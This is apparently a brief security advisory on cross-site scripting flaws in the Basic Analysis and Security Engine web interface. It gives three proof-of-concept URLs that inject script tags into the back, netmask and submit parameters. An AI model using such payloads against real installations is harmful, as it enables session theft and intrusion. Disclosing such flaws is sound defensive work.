Basic Analysis and Security Engine PrintFreshPage Cross-Site Scripting Vulnerability

Basic Analysis and Security Engine PrintFreshPage Cross-Site Scripting Vulnerability

This issue can be exploited through a web client.

The following proof-of-concept examples are available:

http://www.example.com/base/base_graph_main.php?back="><script>alert("780")</script><"

http://www.example.com/base/base_stat_ipaddr.php?ip=1.1.1.1&netmask="><script>alert("780")</script><"

http://www.example.com/base-snort/base_qry_alert.php?submit=<script>780</script>&sort_order=